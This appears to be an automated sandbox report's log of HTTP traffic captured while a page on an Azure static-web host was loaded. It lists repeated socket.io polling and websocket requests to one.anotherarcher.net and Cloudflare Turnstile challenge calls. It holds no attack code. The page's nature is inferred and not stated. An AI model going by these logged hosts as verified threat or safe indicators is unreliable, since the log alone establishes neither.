Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB0Qw HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 4zZ97WFKUPrU0KaIQeeRSA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB0jB&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB0Qw HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB0j8&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB126&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB0jB&sid=l9OfwbTGmMMuZt1pAANO HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7c5dee932f4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7c5dee932f4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB1pJ HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: CZlOQGVzsaaP/gUHc3AcZA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB2AG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd7c5dee932f4/1727989031964/firzFkNJpTj_uwa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB2ZG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB1pJ HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB29w&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB2AG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd7c5dee932f4/1727989031964/firzFkNJpTj_uwa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd7c5dee932f4/1727989031975/c050b6afae937e31e19da54d9e98b8287ddc08ae038e1fc794032090cb2b1a09/DmZznhDpVk2y9G8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7ea7f73238a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB2ZG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7ea7f73238a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB33y HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/136349667:1727987345:YIwZHJwwHqPIcBZYWS-e5MClYzwtIJxGEVjRi2T8QKc/8ccfd7ea7f73238a/742272a500bdc81 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: SygAnqU9uz1qSZEW4iQ/oA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB3JO&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB33y HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd7ea7f73238a/1727989036533/e770f48f5b9749bfdcc46c36818001666acdbcacdfd39cdef621d12f9f2395b6/7jF8x5IxNNu0sBR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB3bm&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd7ea7f73238a/1727989036537/D-jJSXgtibOEtnj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB3JO&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB3JN&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd805a9cd425d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd7ea7f73238a/1727989036537/D-jJSXgtibOEtnj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
